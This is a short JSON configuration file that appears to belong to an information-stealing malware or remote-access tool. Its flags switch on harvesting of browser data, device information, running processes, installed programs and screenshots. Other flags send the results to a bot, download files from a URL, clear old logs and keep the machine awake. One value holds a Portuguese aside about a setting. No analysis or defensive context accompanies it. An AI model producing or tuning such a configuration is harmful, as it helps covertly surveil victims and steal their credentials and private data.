{
    "delay_logs_sec": "2400",
    "device_info": "true",
    "browsers": "true",
    "list_programs": "acho que esse abre ps na tela",
    "desktop": "off",
    "documents": "off",
    "downloads": "off",
    "sendbot": "true",
    "download_url_file": "true",
    "clear_old_logs": "true",
    "list_process": "true",
    "screenshot": "true",
    "no_sleep": "true"
}
